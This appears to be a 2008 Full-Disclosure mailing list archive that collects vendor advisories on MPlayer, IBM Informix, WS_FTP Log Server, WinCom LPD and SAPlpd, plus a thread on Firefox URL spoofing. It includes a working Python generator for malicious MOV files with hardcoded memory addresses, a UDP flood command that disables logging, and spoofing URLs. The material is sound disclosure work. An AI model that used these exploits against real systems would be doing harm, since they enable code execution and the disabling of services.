19:27:16 2008 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Mon, 04 Feb 2008 17:27:16 -0200 Subject: [Full-disclosure] CORE-2008-0122: MPlayer arbitrary pointer dereference Message-ID: <47A76714.6080001@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs MPlayer arbitrary pointer dereference *Advisory Information* Title: MPlayer arbitrary pointer dereference Advisory ID: CORE-2008-0122 Advisory URL: http://www.coresecurity.com/?action=item&id=2102 Date published: 2008-02-04 Date of last update: 2008-01-30 Vendors contacted: MPlayer team Release mode: Coordinated release *Vulnerability Information* Class: Buffer overflow Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 27499 CVE Name: CVE-2008-0485 *Vulnerability Description* The MPlayer package [1] is vulnerable to an arbitrary pointer dereference vulnerability, which can be exploited by malicious remote attackers to compromise a user's system. The vulnerability is caused by the MPlayer libmpdemux ('demux_mov.c') library not properly sanitizing certain tags on a MOV file before using them to index an array on the heap. This can be exploited to execute arbitrary commands by opening a specially crafted file. *Vulnerable Packages* . MPlayer 1.0 rc2. . Older versions are probably affected too, but they were not checked. *Non-vulnerable Packages* . MPlayer SVN HEAD after r25922 (Tue Jan 29 22:14:00 2008 UTC). . MPlayer 1.0rc2 + security patches. *Vendor Information, Solutions and Workarounds* A fix for this problem was committed to SVN on the MPlayer project [2]. Users of affected MPlayer versions should download a patch [3] for MPlayer 1.0rc2 or update to the latest version if they are using SVN. *Credits* This vulnerability was discovered and researched by Felipe Manzano and Anibal Sacco from Core Security Technologies. *Technical Description / Proof of Concept Code* First some information from Quicktime File Format Specification (may 1996): "A QuickTime file stores the description of the media separately from the media data. The description, or meta-data, is called the movie and contains information such as the number of tracks, video compression format, and timing information. The movie also contains an index of where all the media data is stored. The media data is all of the actual sample data, such as video frames and audio samples. The media data may be stored in the same file as the QuickTime movie, in a separate file, or in several files. ...QuickTime uses two basic structures for storing information: atoms and QT atoms. Both atoms and QT atoms allow you to construct arbitrarily complex hierarchical data structures. Both also allow applications to ignore data they don't understand." An atom field has a LTV format (Length - Tag - Value) and the sizes are the following: /----------- +--------------+ | Size | (32 bits) +--------------+ | Tag | (32 bits) +--------------+ | Payload | (variable, which could contain other atoms inside) +--------------+ - -----------/ The MPlayer software walks these atoms structures and parses the 'Payload' fields. The vulnerability occurs when parsing the 'stsc' atom tag (which could be contained or not inside another atom) as we explain below. At 'mov_demux.c' (line 1768) an array of 'chunkmap' structures is filled by reading data straight from file without any kind of check. Then, at 'mov_build_index()' (line 150), the 'trak->chunkmap[i].first' field is used to index the heap array 'chunks' allowing an attacker to write the 'sdid' and 'spc' values at some memory address relative to that heap pointer causing a memory corruption. This could be used to overwrite function pointers or some critical data allowing an attacker to get code execution. Besides, it is possible to fool the parser in a way such that no memory is allocated for the array pointed by 'trak->chunks', being initialized to 0 (at line 1301). Doing this will remove the "relative to that heap pointer" restriction allowing an attacker to write partially at almost any memory address. Why partially? Because the structure used to write is declared in this way: /----------- typedef struct { unsigned int sample; // number of the first sample in the chunk unsigned int size; // number of samples in the chunk int desc; // for multiple codecs mode - not used off_t pos; } mov_chunk_t; - -----------/ So, being 'desc' and 'size' the controlled fields it is possible to write at memory address: 'i*sizeof(chunk_t)+4' and 'i*sizeof(chunk_t)+8' for any 'i' value (at lines 177 and 178). /----------- 1755 case MOV_FOURCC('s','t','s','c'): { 1756 int temp = stream_read_dword(demuxer->stream); 1757 int len = stream_read_dword(demuxer->stream); 1758 int ver = (temp << 24); 1759 int flags = (temp << 16) | (temp << 8) | temp; 1760 int i; 1761 mp_msg(MSGT_DEMUX, MSGL_V, 1762 "MOV: %*sSample->Chunk mapping table! (%d blocks) (ver:%d,flags:%d)\n", level, "", 1763 len, ver, flags); 1764 // read data: 1765 trak->chunkmap_size = len; 1766 trak->chunkmap = calloc(len, sizeof(mov_chunkmap_t)); 1767 for (i = 0; i < len; i++) { 1768 trak->chunkmap[i].first = stream_read_dword(demuxer->stream) - 1; 1769 trak->chunkmap[i].spc = stream_read_dword(demuxer->stream); 1770 trak->chunkmap[i].sdid = stream_read_dword(demuxer->stream); 1771 } 1772 break; 1773 } 150 void mov_build_index(mov_track_t* trak,int timescale){ 151 int i,j,s; 152 int last=trak->chunks_size; 153 unsigned int pts=0; 154 169 mp_msg(MSGT_DEMUX, MSGL_V, "MOV track #%d: %d chunks, %d samples\n",trak->id,trak->chunks_size,trak->samples_size); 170 mp_msg(MSGT_DEMUX, MSGL_V, "pts=%d scale=%d time=%5.3f\n",trak->length,trak->timescale,(float)trak->length/(float)trak->timescale); 171 172 // process chunkmap: 173 i=trak->chunkmap_size; 174 while(i>0){ 175 --i; 176 for(j=trak->chunkmap[i].first;jchunks[j].desc=trak->chunkmap[i].sdid; 178 trak->chunks[j].size=trak->chunkmap[i].spc; 179 } 180 last=trak->chunkmap[i].first; 181 } - -----------/ In this way, as we show in the following PoC, it is possible to build a file that contains specially crafted 'stsc' atoms allowing an attacker to write any value in practically any address. With this clear and some voodoo magic it is possible to write a scattered payload that builds a fully functional shellcode on some other place to subsequently jump to. The following PoC python code demonstrates the vulnerability. /----------- #!/bin/python import struct import sys def mkatom(type,data): if len(type) != 4: raise "type must by of length 4!!!" mov = "" mov += struct.pack(">L",len(data)+8) mov += type mov += data return mov def poc(address, block_size): what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk base= ((address - 8) / block_size) +1 ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1") mdat = mkatom("mdat","MALDAAAAAD!") stsc = mkatom("stsc",struct.pack(">L",1) + \ struct.pack(">L",2) + \ struct.pack(">L",base) + \ what + \ struct.pack(">L",base+300)+what) trak = mkatom("trak",stsc) moov = mkatom("moov",trak) file = ftyp + mdat + moov return file try: if sys.argv[2] != "linux": evilness = poc(0x0122e000, 24) #Windows XP SP2 Prof. ES else: evilness = poc(0x088aa020, 20) #Linux Gentoo print "[+] Generating file: %s" % sys.argv[1] file = open(sys.argv[1], "wb") file.write(evilness) file.close() print "[+] Done." except Exception, e: print "[+] Usage: python mplayer_poc.py filename.mov windows (For WinXP Prof SP2 ES)" print " python mplayer_poc.py filename.mov linux (For Linux Gentoo)" - -----------/ *Report Timeline* . 2008-01-18: Core Security Technologies notifies the MPlayer team of the vulnerability. . 2008-01-18: The MPlayer team asks Core Security Technologies for technical description of the vulnerability. . 2008-01-22: Technical details sent to MPlayer team by Core Security Technologies. . 2008-01-28: MPlayer notifies Core Security Technologies that a fix has been produced. . 2008-02-04: CORE-2008-0122 advisory is published. *References* [1] http://www.mplayerhq.hu [2] http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_mov.c?r1=25920&r2=25922 [3] http://www.mplayerhq.hu/MPlayer/patches/demux_mov_fix_20080129.diff *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHp2cUyNibggitWa0RAt6mAJ49+DbotNeLAGZsUT+GngtZsKrRJQCeOL0d cHhAkwi751HR3NJSPFW7CxA= =sS4h -----END PGP SIGNATURE----- From advisories at coresecurity.com Mon Feb 4 19:43:30 2008 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Mon, 04 Feb 2008 17:43:30 -0200 Subject: [Full-disclosure] CORE-2007-1218: MPlayer 1.0rc2 buffer overflow vulnerability Message-ID: <47A76AE2.6080708@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs MPlayer 1.0rc2 buffer overflow vulnerability *Advisory Information* Title: MPlayer 1.0rc2 buffer overflow vulnerability Advisory ID: CORE-2007-1218 Advisory URL: http://www.coresecurity.com/?action=item&id=2103 Date published: 2008-02-04 Date of last update: 2008-02-01 Vendors contacted: MPlayer and Xine team Release mode: Coordinated release *Vulnerability Information* Class: Buffer overflow Remotely Exploitable: No Locally Exploitable: Yes Bugtraq ID: 27441 CVE Name: CVE-2008-0486 *Vulnerability Description* The MPlayer package [1] is vulnerable to a buffer overflow attack, which can be exploited by malicious remote attackers. The vulnerability is due to MPlayer not properly sanitizing certain tags on a FLAC file before using them to index an array on the stack. This can be exploited to execute arbitrary commands by opening a specially crafted file. The Xine package [2], and probably other packages based on MPlayer [3], are vulnerable to this attack too. *Vulnerable Packages* . MPlayer 1.0rc2 and SVN before r25917 (Tue Jan 29 22:00:58 2008 UTC). Older versions are probably affected too, but they were not checked. . Xine-lib 1.1.10. Other MPlayer related projects are affected too. *Non-vulnerable Packages* . MPlayer SVN HEAD after r25917. . MPlayer 1.0rc2 + security patches. *Vendor Information, Solutions and Workarounds* A fix for this problem was committed to SVN on the MPlayer project [4]. Users of affected MPlayer versions should download a patch [5] for MPlayer 1.0rc2 or update to the latest version if they are using SVN. *Credits* This vulnerability was discovered by Damian Frizza and Alfredo Ortega, from the Exploit Writers team of Core Security Technologies. *Technical Description / Proof of Concept Code* The vulnerability was found in the following code, used to parse FLAC comments inside MPlayer: /----------- libmpdemux/demux_audio.c 206 case FLAC_VORBIS_COMMENT: 207 { 208 /* For a description of the format please have a look at */ 209 /* http://www.xiph.org/vorbis/doc/v-comment.html */ 210 211 uint32_t length, comment_list_len; 212 (1) char comments[blk_len]; 213 uint8_t *ptr = comments; 214 char *comment; 215 int cn; 216 char c; 217 218 if (stream_read (s, comments, blk_len) == blk_len) 219 { 220 (2) length = AV_RL32(ptr); 221 ptr += 4 + length; 222 223 comment_list_len = AV_RL32(ptr); 224 ptr += 4; 225 226 cn = 0; 227 for (; cn < comment_list_len; cn++) 228 { 229 length = AV_RL32(ptr); 230 ptr += 4; 231 232 comment = ptr; 233 (3) c = comment[length]; 234 comment[length] = 0; ... - -----------/ We can see in (2) that the 'length' variable is being loaded from a position on the file stream, and then used without any validation to index the 'comment' buffer, that was allocated from the stack in (1). This causes a stack corruption, and possibly allows code execution (e.g. modifying the value of the 'length' variable, that is also on the stack). Example Attack Scenario: 1) The user receives an email with an attachment called e.g. 'goodmusic.flac'. 2) The user opens the file with MPlayer or another vulnerable software. 3) This causes a stack corruption and malicious code execution on the user computer. *Report Timeline* . 2007-12-18: Core Security Technologies notifies the MPlayer team of the vulnerability (no reply received). . 2008-01-04: A new notification of the vulnerability was sent to the MPlayer team (no reply received). . 2008-01-18: A new notification of the vulnerability was sent to the MPlayer team. . 2008-01-18: The MPlayer team asked Core Security Technologies for technical description of the vulnerability. . 2008-01-22: Technical details was sent to MPlayer team by Core Security Technologies. . 2008-01-28: MPlayer notified Core Security Technologies that a fix had been produced. . 2008-02-04: CORE-2007-1218 advisory was published. *References* [1] http://www.mplayerhq.hu [2] http://xinehq.de/ [3] http://www.mplayerhq.hu/design7/projects.html [4] http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_audio.c?r1=25911&r2=25917 [5] http://www.mplayerhq.hu/MPlayer/patches/demux_audio_fix_20080129.diff *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHp2riyNibggitWa0RApD/AKCtN46G9t/7fMEutRQbUx6uVKonDwCfWYcb g+kdvVlvzynfGW8XUUI1v7w= =Byqy -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Mon Feb 4 19:48:20 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 04 Feb 2008 14:48:20 -0500 Subject: [Full-disclosure] iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server SQLIDEBUG File Creation Vulnerability Message-ID: <47A76C04.90504@idefense.com> iDefense Security Advisory 01.31.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 31, 2008 I. BACKGROUND IBM Corp.'s Informix Dynamic Server is an online transaction processing data server. For more information, visit the product's homepage at the following URL. http://www-306.ibm.com/software/data/informix/ids/ II. DESCRIPTION Local exploitation of a file creation vulnerability in IBM Corp.'s Informix Dynamic Server allows attackers to elevate privileges to root. When the SQLIDEBUG environment variable is set, several set-uid binaries will log debugging information to the specified file. III. ANALYSIS Exploitation allows local attackers to gain root privileges. After creating the file, the file's ownership is changed to match the user and group of the executing user. As such, an attacker could create files that they own anywhere on the system. IV. DETECTION iDefense confirmed the existence of this vulnerability in IBM Corp.'s Informix Dynamic Server version 10.00 UC6TL installed on a Linux system. Other versions are also suspected as vulnerable. Versions for other supported Unix systems should also be considered vulnerable. V. WORKAROUND Removing the set-uid bit from all programs included with Informix will prevent exploitation. However, this could disable some functionality for non-root users. VI. VENDOR RESPONSE IBM Corp. has addressed this vulnerability with the release of version 10.00.xC8 of Informix Dynamic Server. For more information, visit the following URL. http://www-1.ibm.com/support/docview.wss?uid=swg27011556 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0369 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/01/2007 Initial vendor notification 09/13/2007 Initial vendor response 01/31/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Mon Feb 4 19:49:53 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 04 Feb 2008 14:49:53 -0500 Subject: [Full-disclosure] iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server onedcu File Creation Vulnerability Message-ID: <47A76C61.70209@idefense.com> iDefense Security Advisory 01.31.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 31, 2008 I. BACKGROUND IBM Corp.'s Informix Dynamic Server is an online transaction processing data server. For more information, visit the product's homepage at the following URL. http://www-306.ibm.com/software/data/informix/ids/ II. DESCRIPTION Local exploitation of a file creation vulnerability in IBM Corp.'s Informix Dynamic Server allows attackers to elevate privileges to root. The set-uid root "onedcu" command requires six parameters to be specified when it is executed. The second parameter is a "Trace" file that this program will open and write to with elevated privileges. III. ANALYSIS Exploitation allows local attackers to gain root privileges. IV. DETECTION iDefense confirmed the existence of this vulnerability in IBM Corp.'s Informix Dynamic Server version 10.00 UC6TL installed on a Linux system. Other versions are also suspected as vulnerable. Versions for other supported Unix systems should also be considered vulnerable. V. WORKAROUND Removing the set-uid bit from the "onedcu" program included with Informix will prevent exploitation. However, this could disable some functionality for non-root users. VI. VENDOR RESPONSE IBM Corp. has addressed this vulnerability with the release of version 10.00.xC8 of Informix Dynamic Server. For more information, visit the following URL. http://www-1.ibm.com/support/docview.wss?uid=swg27011556 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0368 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/01/2007 Initial vendor notification 09/13/2007 Initial vendor response 01/31/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From hardwick.carl at gmail.com Mon Feb 4 20:10:31 2008 From: hardwick.carl at gmail.com (carl hardwick) Date: Mon, 4 Feb 2008 21:10:31 +0100 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities Message-ID: Firefox seems to have trouble with defining the proper hostname when requesting a ssl connection. I was able to trick Firefox in thinking the hostname behind the at-sign is legit and the same as the URI that requested an ssl connection, and this without a warning. PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com You can add as much garbage between .com and the @ sign. So what else can we do? PoC: www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail ah heck we don't need that at all: www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail works fine also :) From my.security.lists at gmail.com Mon Feb 4 21:10:55 2008 From: my.security.lists at gmail.com (Rob Thompson) Date: Mon, 4 Feb 2008 13:10:55 -0800 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: References: Message-ID: <4f32729a0802041310v6739cd2bj12a91abac096f140@mail.gmail.com> I only see that FF is current to version 2.0.0.11. Are you sure that you are finding this in 2.0.0.12? If so, where are you getting this version from? On Feb 4, 2008 12:10 PM, carl hardwick wrote: > Firefox seems to have trouble with defining the proper hostname when > requesting a ssl connection. I was able to trick Firefox in thinking > the hostname behind the at-sign is legit and the same as the URI that > requested an ssl connection, and this without a warning. > > PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com > > You can add as much garbage between .com and the @ sign. > > So what else can we do? > > PoC: > www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google > www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail > > ah heck we don't need that at all: > www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail > > works fine also :) > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Rob From smenard at nbnet.nb.ca Mon Feb 4 20:36:20 2008 From: smenard at nbnet.nb.ca (steve menard) Date: Mon, 04 Feb 2008 16:36:20 -0400 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: References: Message-ID: <47A77744.9020709@nbnet.nb.ca> I get a warning on 2.0.0.11 Linux Ubuntu You are about to log into the site "google" with the username "www%2Ecnn at 2Ecom%c0%AF%C0%AF%C0%C0%80", but the website does not require authentication. this may be an attempt to trick you Is "google" the site you want to visit.? is this a 2.0.0.12 issue? Steve carl hardwick wrote: > Firefox seems to have trouble with defining the proper hostname when > requesting a ssl connection. I was able to trick Firefox in thinking > the hostname behind the at-sign is legit and the same as the URI that > requested an ssl connection, and this without a warning. > > PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com > > You can add as much garbage between .com and the @ sign. > > So what else can we do? > > PoC: > www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google > www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail > > ah heck we don't need that at all: > www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail > > works fine also :) > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From reepex at gmail.com Mon Feb 4 21:25:33 2008 From: reepex at gmail.com (reepex) Date: Mon, 4 Feb 2008 15:25:33 -0600 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: References: Message-ID: I am not sure the intended point of the exploit since you have @roguehost and not a proper POC, but I believe all you have triggered is normal behavior for auto logging into .htaccess protected folders in the form username:password at host.com http://forum.sambarserver.info/viewtopic.php?p=288 http://www.freewebmasterhelp.com/tutorials/htaccess/3 I did it with google.com and @mail.yahoo.com and it tried to log me into mail.yahoo.com with google.... as my username as expected On Feb 4, 2008 2:10 PM, carl hardwick wrote: > Firefox seems to have trouble with defining the proper hostname when > requesting a ssl connection. I was able to trick Firefox in thinking > the hostname behind the at-sign is legit and the same as the URI that > requested an ssl connection, and this without a warning. > > PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com > > You can add as much garbage between .com and the @ sign. > > So what else can we do? > > PoC: > www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google > www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail > > ah heck we don't need that at all: > www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail > > works fine also :) > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080204/d3346a32/attachment.html From aluigi at autistici.org Mon Feb 4 21:31:49 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 4 Feb 2008 22:31:49 +0100 Subject: [Full-disclosure] Socket termination in FTP Log Server 7.9.14.0 Message-ID: <20080204223149.fcce4c63.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: FTP Log Server http://www.wsftp.com Versions: <= 7.9.14.0 Platforms: Windows Bug: socket termination Exploitation: remote Date: 04 Feb 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== FTP Log Server is a daemon installed and running with Ipswitch WS_FTP which works on the UDP port 5151 and is used for all the logging operations of this FTP server. ####################################################################### ====== 2) Bug ====== Sending more than 20 packets of a size major than 4096 bytes (the maximum size of a packet which can be received by the server) within less than one second between them causes the silent termination of the listening socket (offset 004013FD), so the process of the daemon will continue to be active but it will no longer handle the log commands of the FTP or any other server which supports it. Although the daemon binds all the interfaces (and I doubt an admin leaves the UDP port 5151 accessible from Internet, moreover to avoid custom entries in the XML logs) the main scenario of a possible exploiting of this vulnerability is in a LAN environment for example used for disabling the logging service and starting a brute forcing attack versus the machine on which is running the FTP server and so on. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -l 100 SERVER 5151 4097 ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From aluigi at autistici.org Mon Feb 4 21:36:32 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 4 Feb 2008 22:36:32 +0100 Subject: [Full-disclosure] Multiple vulnerabilities in WinCom LPD Total 3.0.2.623 Message-ID: <20080204223632.1ccd2f05.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: WinCom LPD Total - Line Printer Daemon http://clientsoftware.com.au/lpd.html Versions: <= 3.0.2.623 Platforms: Windows Bugs: A] buffer-overflow in control filename B] remote administration bypassing C] integer memcpy crash in remote administration D] buffer-overflow in remote administration Exploitation: remote Date: 04 Feb 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== WinCom LPD Total (wincomlpd) is a commercial line printer daemon for Windows. ####################################################################### ======= 2) Bugs ======= -------------------------------------- A] buffer-overflow in control filename -------------------------------------- wincomlpd is affected by a buffer-overflow vulnerability exploitable during the building of an error string caused by the impossibility of creating the file specified by the client. The queues of remote printers are not affected by the problem. ---------------------------------- B] remote administration bypassing ---------------------------------- The administration service which runs on port 13500 is used by the local and remote admins for managing the wincomlpd server. The problem here is very simple: the authentication method used by the program is practically unexistent. In short an attacker can manage the wincomlpd server without knowing the admin username and password but simply skipping the auth stage. This bug can be exploited in at least two ways: writing an alternative client (the protocol is enough simple so it's not a problem) or just modifying the admin client program (LPDAdmin.exe). ------------------------------------------------ C] integer memcpy crash in remote administration ------------------------------------------------ The 8 and 16 bit values used in the remote administration protocol for specifying respectively the length of the strings (like the printer's name to add) and the size of the data block are signed integers. That allows an attacker to crash the remote wincomlpd service simply using negative values like 0x80 or 0xff for the 8 bits numbers and 0x8000 or 0xffff for the data block and so on. This bug can be also used for exploiting the subsequent vulnerability. ------------------------------------------- D] buffer-overflow in remote administration ------------------------------------------- A buffer-overflow is located in the function which copies the data from the values explained before in a stack buffer. Naturally the criticality of the above two vulnerabilities is related to the possibility of bypassing the authentication explained in bug B. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/wincomalpd.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From aluigi at autistici.org Mon Feb 4 21:32:59 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 4 Feb 2008 22:32:59 +0100 Subject: [Full-disclosure] Multiple vulnerabilities in SAPlpd 6.28 Message-ID: <20080204223259.9b364f1d.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: SAPlpd http://www.sap.com Versions: <= 6.28 (included in SAP GUI 7.10) Platforms: Windows Bugs: various vulnerabilities Exploitation: remote Date: 04 Feb 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== SAPlpd is a small and very old (2001) line printer daemon for Windows which is included in the SAP GUI package. ####################################################################### ======= 2) Bugs ======= The daemon is affected by various vulnerabilities which, for brevity, I have decided to list through the lpd commands (in hex) accepted by the program: commands type of bug 01 31 memcpy 02 32 memcpy + sprintf "Receive job for printer %s (berkley protocol)\n" 03 04 33 34 sprintf "QUERY = %s\n" + multiple strcpy 05 35 multiple strcpy 53 server termination ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/saplpdz.zip ####################################################################### ====== 4) Fix ====== Vendor contacted, a patch will be released soon. ####################################################################### --- Luigi Auriemma http://aluigi.org From juha-matti.laurio at netti.fi Mon Feb 4 23:18:26 2008 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Tue, 5 Feb 2008 01:18:26 +0200 (EET) Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities Message-ID: <649944.3191202167107189.JavaMail.juha-matti.laurio@netti.fi> The most recent Firefox 2.0.0.12 version is RC4 still: http://www.mozilla.com/en-US/firefox/2.0.0.12/releasenotes/ You can't download Firefox 2.0.12 Final yet. Juha-Matti carl hardwick wrote: > Firefox seems to have trouble with defining the proper hostname when > requesting a ssl connection. I was able to trick Firefox in thinking > the hostname behind the at-sign is legit and the same as the URI that > requested an ssl connection, and this without a warning. > > PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com > > You can add as much garbage between .com and the @ sign. > > So what else can we do? > > PoC: > www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google > 